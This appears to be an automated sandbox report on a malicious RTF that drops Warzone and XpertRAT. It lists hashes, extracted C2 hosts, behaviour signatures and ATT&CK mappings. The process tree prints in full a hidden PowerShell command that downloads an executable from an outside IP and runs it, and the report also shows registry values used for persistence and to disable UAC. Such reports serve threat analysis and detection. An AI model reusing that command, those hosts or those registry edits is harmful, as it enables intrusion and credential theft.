warzonerat | 1d0f4b56524f0e8aa3813ae9f2cdbf5a272167e28f11c3822c95d415347e5ba1

Analysis

max time kernel
152s
max time network
148s
platform
windows7_x64
resource
win7v20201028
submitted
05-12-2020 11:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Troj.XMLDwn-AS.10120.0.rtf
Size

813KB
MD5

03d11e6b979a69b7ebda725436ab236e
SHA1

98ff07105b6e3972f79d9ad872730a2a7da1063d
SHA256

1d0f4b56524f0e8aa3813ae9f2cdbf5a272167e28f11c3822c95d415347e5ba1
SHA512

99a88a180fc52a3f21d68f12d933ec32fedcbe45243a886c9448150a690d4b660ff8385c0c94290c392f37a6defc0cb54da7fe82a61eb8e0f522602591d02e70

Score

10^/10

warzonerat xpertrat special x evasion infostealer persistence rat spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

httP://192.3.194.245/xpertorigin.exe

Extracted

Family

warzonerat

195.140.214.82:6703

Extracted

Family

xpertrat

Version

3.0.10

Botnet

special X

zytriew.duckdns.org:4145

papertyy.duckdns.org:4145

ghytrty.duckdns.org:4145

Mutex

A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1492	1844	powershell.exe	WINWORD.EXE

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
XpertRAT
XpertRAT is a remote access trojan with various capabilities.
rat xpertrat

XpertRAT Core Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1240-49-0x0000000000400000-0x0000000000443000-memory.dmp	xpertrat
behavioral1/memory/1240-50-0x0000000000401364-mapping.dmp	xpertrat
behavioral1/memory/1240-51-0x0000000000400000-0x0000000000443000-memory.dmp	xpertrat

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/1228-61-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView
behavioral1/memory/1228-62-0x0000000000411654-mapping.dmp	MailPassView
behavioral1/memory/1228-63-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/708-66-0x0000000000400000-0x0000000000459000-memory.dmp	WebBrowserPassView
behavioral1/memory/708-67-0x0000000000442F04-mapping.dmp	WebBrowserPassView
behavioral1/memory/708-68-0x0000000000400000-0x0000000000459000-memory.dmp	WebBrowserPassView

Nirsoft 11 IoCs

Processes:

resource	yara_rule
behavioral1/memory/584-60-0x0000000000400000-0x0000000000426000-memory.dmp	Nirsoft
behavioral1/memory/1228-61-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral1/memory/1228-62-0x0000000000411654-mapping.dmp	Nirsoft
behavioral1/memory/1228-63-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral1/memory/708-66-0x0000000000400000-0x0000000000459000-memory.dmp	Nirsoft
behavioral1/memory/708-67-0x0000000000442F04-mapping.dmp	Nirsoft
behavioral1/memory/708-68-0x0000000000400000-0x0000000000459000-memory.dmp	Nirsoft
behavioral1/memory/912-74-0x0000000000400000-0x0000000000416000-memory.dmp	Nirsoft
behavioral1/memory/1332-75-0x0000000000400000-0x0000000000415000-memory.dmp	Nirsoft
behavioral1/memory/1332-76-0x000000000040C2A8-mapping.dmp	Nirsoft
behavioral1/memory/1332-77-0x0000000000400000-0x0000000000415000-memory.dmp	Nirsoft

Warzone RAT Payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/1112-32-0x0000000000750000-0x00000000008A4000-memory.dmp	warzonerat

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1 = "C:\\Users\\Admin\\AppData\\Roaming\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1.exe"	iexplore.exe

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 1492 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

xpertorigin.exe.oBHHDgvA.exe

pid process

1112 xpertorigin.exe
2028 .oBHHDgvA.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

flow	pid	process
6	1492	powershell.exe

pid	process
1112	xpertorigin.exe
2028	.oBHHDgvA.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/584-56-0x0000000000400000-0x0000000000426000-memory.dmp	upx
behavioral1/memory/584-58-0x0000000000400000-0x0000000000426000-memory.dmp	upx
behavioral1/memory/584-59-0x0000000000400000-0x0000000000426000-memory.dmp	upx
behavioral1/memory/584-60-0x0000000000400000-0x0000000000426000-memory.dmp	upx
behavioral1/memory/912-70-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral1/memory/912-72-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral1/memory/912-73-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral1/memory/912-74-0x0000000000400000-0x0000000000416000-memory.dmp	upx

Loads dropped DLL 12 IoCs

Processes:

powershell.exexpertorigin.exe.oBHHDgvA.exe

pid	process
1492	powershell.exe
1112	xpertorigin.exe
2028	.oBHHDgvA.exe
2028	.oBHHDgvA.exe
2028	.oBHHDgvA.exe
112
1112	xpertorigin.exe
1112	xpertorigin.exe
1112	xpertorigin.exe
1112	xpertorigin.exe
1112	xpertorigin.exe
1112	xpertorigin.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Windows security modification 2 TTPs 1 IoCs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

.oBHHDgvA.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" .oBHHDgvA.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0"	.oBHHDgvA.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1 = "C:\\Users\\Admin\\AppData\\Roaming\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1.exe"	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1 = "C:\\Users\\Admin\\AppData\\Roaming\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1.exe"	iexplore.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

.oBHHDgvA.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" .oBHHDgvA.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	.oBHHDgvA.exe

Modifies WinLogon 2 TTPs 4 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

xpertorigin.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	xpertorigin.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	xpertorigin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\d.oirKh = "0"	xpertorigin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	xpertorigin.exe

Drops file in System32 directory 1 IoCs

Processes:

xpertorigin.exe

description ioc process

File created C:\Windows\System32\rfxvmt.dll xpertorigin.exe

description	ioc	process
File created	C:\Windows\System32\rfxvmt.dll	xpertorigin.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

.oBHHDgvA.exeiexplore.exe

description	pid	process	target process
PID 2028 set thread context of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 set thread context of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 set thread context of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 1240 set thread context of 584	1240	iexplore.exe	iexplore.exe
PID 1240 set thread context of 1228	1240	iexplore.exe	iexplore.exe
PID 1240 set thread context of 1328	1240	iexplore.exe	iexplore.exe
PID 1240 set thread context of 708	1240	iexplore.exe	iexplore.exe
PID 1240 set thread context of 912	1240	iexplore.exe	iexplore.exe
PID 1240 set thread context of 1332	1240	iexplore.exe	iexplore.exe

Drops file in Program Files directory 2 IoCs

Processes:

xpertorigin.exe

description	ioc	process
File created	C:\Program Files\Microsoft DN1\sqlmap.dll	xpertorigin.exe
File created	C:\Program Files\Microsoft DN1\rdpwrap.ini	xpertorigin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1844 WINWORD.EXE

pid	process
1844	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exe.oBHHDgvA.exeiexplore.exe

pid	process
1492	powershell.exe
1492	powershell.exe
2028	.oBHHDgvA.exe
2028	.oBHHDgvA.exe
2028	.oBHHDgvA.exe
2028	.oBHHDgvA.exe
2028	.oBHHDgvA.exe
2028	.oBHHDgvA.exe
2028	.oBHHDgvA.exe
2028	.oBHHDgvA.exe
708	iexplore.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

WINWORD.EXE

pid process

1844 WINWORD.EXE
Suspicious behavior: LoadsDriver 4 IoCs

Processes:

pid process

112
112
112
112

pid	process
1844	WINWORD.EXE

pid	process
112
112
112
112

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exexpertorigin.exeiexplore.exeiexplore.exe

description	pid	process
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeDebugPrivilege	1112	xpertorigin.exe
Token: SeDebugPrivilege	1240	iexplore.exe
Token: SeDebugPrivilege	584	iexplore.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

WINWORD.EXE.oBHHDgvA.exeiexplore.exe

pid process

1844 WINWORD.EXE
1844 WINWORD.EXE
1844 WINWORD.EXE
2028 .oBHHDgvA.exe
1240 iexplore.exe

pid	process
1844	WINWORD.EXE
1844	WINWORD.EXE
1844	WINWORD.EXE
2028	.oBHHDgvA.exe
1240	iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEpowershell.exexpertorigin.exe.oBHHDgvA.exeiexplore.exe

description	pid	process	target process
PID 1844 wrote to memory of 1492	1844	WINWORD.EXE	powershell.exe
PID 1844 wrote to memory of 1492	1844	WINWORD.EXE	powershell.exe
PID 1844 wrote to memory of 1492	1844	WINWORD.EXE	powershell.exe
PID 1844 wrote to memory of 1492	1844	WINWORD.EXE	powershell.exe
PID 1844 wrote to memory of 1652	1844	WINWORD.EXE	splwow64.exe
PID 1844 wrote to memory of 1652	1844	WINWORD.EXE	splwow64.exe
PID 1844 wrote to memory of 1652	1844	WINWORD.EXE	splwow64.exe
PID 1844 wrote to memory of 1652	1844	WINWORD.EXE	splwow64.exe
PID 1492 wrote to memory of 1112	1492	powershell.exe	xpertorigin.exe
PID 1492 wrote to memory of 1112	1492	powershell.exe	xpertorigin.exe
PID 1492 wrote to memory of 1112	1492	powershell.exe	xpertorigin.exe
PID 1492 wrote to memory of 1112	1492	powershell.exe	xpertorigin.exe
PID 1112 wrote to memory of 2028	1112	xpertorigin.exe	.oBHHDgvA.exe
PID 1112 wrote to memory of 2028	1112	xpertorigin.exe	.oBHHDgvA.exe
PID 1112 wrote to memory of 2028	1112	xpertorigin.exe	.oBHHDgvA.exe
PID 1112 wrote to memory of 2028	1112	xpertorigin.exe	.oBHHDgvA.exe
PID 1112 wrote to memory of 2028	1112	xpertorigin.exe	.oBHHDgvA.exe
PID 1112 wrote to memory of 2028	1112	xpertorigin.exe	.oBHHDgvA.exe
PID 1112 wrote to memory of 2028	1112	xpertorigin.exe	.oBHHDgvA.exe
PID 2028 wrote to memory of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1644	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 2024	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 2028 wrote to memory of 1240	2028	.oBHHDgvA.exe	iexplore.exe
PID 1240 wrote to memory of 584	1240	iexplore.exe	iexplore.exe
PID 1240 wrote to memory of 584	1240	iexplore.exe	iexplore.exe
PID 1240 wrote to memory of 584	1240	iexplore.exe	iexplore.exe
PID 1240 wrote to memory of 584	1240	iexplore.exe	iexplore.exe
PID 1240 wrote to memory of 584	1240	iexplore.exe	iexplore.exe
PID 1240 wrote to memory of 584	1240	iexplore.exe	iexplore.exe
PID 1240 wrote to memory of 584	1240	iexplore.exe	iexplore.exe
PID 1240 wrote to memory of 584	1240	iexplore.exe	iexplore.exe
PID 1240 wrote to memory of 584	1240	iexplore.exe	iexplore.exe

System policy modification 1 TTPs 1 IoCs
evasion

Modify Registry
T1112

Processes:

.oBHHDgvA.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" .oBHHDgvA.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	.oBHHDgvA.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Troj.XMLDwn-AS.10120.0.rtf"
1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.245/xpertorigin.exe','C:\Users\Admin\AppData\Roaming\xpertorigin.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\xpertorigin.exe'"
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1492

C:\Users\Admin\AppData\Roaming\xpertorigin.exe
"C:\Users\Admin\AppData\Roaming\xpertorigin.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1112

C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
"C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2028

C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
5⤵
PID:1644

C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
5⤵
PID:2024

C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
5⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1240

C:\Program Files (x86)\Internet Explorer\iexplore.exe
/stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri0.txt"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Program Files (x86)\Internet Explorer\iexplore.exe
/stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri1.txt"
6⤵
PID:1228

C:\Program Files (x86)\Internet Explorer\iexplore.exe
/stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri2.txt"
6⤵
PID:1328

C:\Program Files (x86)\Internet Explorer\iexplore.exe
/stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri2.txt"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:708

C:\Program Files (x86)\Internet Explorer\iexplore.exe
/stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri3.txt"
6⤵
PID:912

C:\Program Files (x86)\Internet Explorer\iexplore.exe
/stext "C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri4.txt"
6⤵
PID:1332

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1652

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
MD5
2e6f05e8245b62297355f070a6f966df

SHA1
7461222b5d34eb2328c7d50a75956f9dc78c32a3

SHA256
f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178

SHA512
44302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899

Download Submit
C:\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
MD5
2e6f05e8245b62297355f070a6f966df

SHA1
7461222b5d34eb2328c7d50a75956f9dc78c32a3

SHA256
f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178

SHA512
44302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899

Download Submit
C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri2.txt
MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\A8O1E003-R4Q1-P8Q3-X4A6-Y2R2V7W0G8T1\evppjnxri4.txt
MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\xpertorigin.exe
MD5
85063571eccad2a81103ea6603ba1e08

SHA1
c762c1e085a489b21c125e75e21683cd86e138c9

SHA256
f5068e95e11b906cf33949376159ed87e03eb29e774029e84b8151c76d69ccf4

SHA512
8a271d14190d2bf5cb9d4a62830b750b64954a9ed5d5ac803dca2ce9e9b38b6a69fd61518e0271dfbddeb20de383d686f6b0d9cfdf26be7ed394b244e41ca12f

Download Submit
C:\Users\Admin\AppData\Roaming\xpertorigin.exe
MD5
85063571eccad2a81103ea6603ba1e08

SHA1
c762c1e085a489b21c125e75e21683cd86e138c9

SHA256
f5068e95e11b906cf33949376159ed87e03eb29e774029e84b8151c76d69ccf4

SHA512
8a271d14190d2bf5cb9d4a62830b750b64954a9ed5d5ac803dca2ce9e9b38b6a69fd61518e0271dfbddeb20de383d686f6b0d9cfdf26be7ed394b244e41ca12f

Download Submit
\Program Files\Microsoft DN1\sqlmap.dll
MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
MD5
2e6f05e8245b62297355f070a6f966df

SHA1
7461222b5d34eb2328c7d50a75956f9dc78c32a3

SHA256
f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178

SHA512
44302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899

Download Submit
\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
MD5
2e6f05e8245b62297355f070a6f966df

SHA1
7461222b5d34eb2328c7d50a75956f9dc78c32a3

SHA256
f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178

SHA512
44302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899

Download Submit
\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
MD5
2e6f05e8245b62297355f070a6f966df

SHA1
7461222b5d34eb2328c7d50a75956f9dc78c32a3

SHA256
f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178

SHA512
44302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899

Download Submit
\Users\Admin\AppData\Roaming\.oBHHDgvA.exe
MD5
2e6f05e8245b62297355f070a6f966df

SHA1
7461222b5d34eb2328c7d50a75956f9dc78c32a3

SHA256
f5c1bcee04671046761d44546a3e4a413049a42cd9067caa25e7640ab5867178

SHA512
44302f90666acbaaedc8c4a8481cc2fdc82da786514683d5c5664f5b6eda7ee4e415e2c4155b1e92f7d93d82ddd60d6f652e35332b5ce50eba84897c5202a899

Download Submit
